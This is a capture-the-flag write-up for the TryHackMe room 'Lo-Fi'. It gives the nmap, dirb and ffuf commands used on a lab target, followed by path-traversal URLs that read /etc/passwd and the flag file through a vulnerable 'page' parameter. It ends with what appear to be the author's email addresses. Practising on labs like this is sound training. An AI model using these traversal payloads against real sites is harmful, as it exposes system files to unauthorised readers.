TryhackMe - Lo-Fi Writeup

My writeup for TryHackMe Room: Lo-Fi

TECH

2/19/2025

Target IP: 10.10.228.19

Box IP: 10.10.113.125

Initial NMap scan

sudo nmap -A 10.10.228.19 -vv

Taking note of open ports, going to enumerate port 80 using dirb

dirb http://10.10.228.19 -w /usr/share/wordlists/dirb.big.txt

Attempt to enter pages results in access denied...

Attempt to enter URL "http://10.10.20.7/?page=/" results in page asking hackers to stay away... (͠≖ ͜ʖ͠≖)

Room suggests LFI knowledge, so I tested using FuFF tool

ffuf -w /usr/share/wordlists/SecLists/Fuzzing/LFI/LFI-Jhaddix.txt -u "http://10.10.228.19/?page=FUZZ" -fl 124

Out of that output, lets start with the shortest: ../../../etc/passwd

Plug that into the URL:

http://10.10.228.19/?page=../../../etc/passwd

It works.... maybe try for the simplest answer:

http://10.10.228.19/?page=../../../etc/flag.txt

No luck in /etc, maybe one more go...

http://10.10.228.19/?page=../../../flag.txt

BINGO!

Honestly, a very fun CTF for a starter!

gerald.rivera1@outlook.com

gerald@damasphotos.com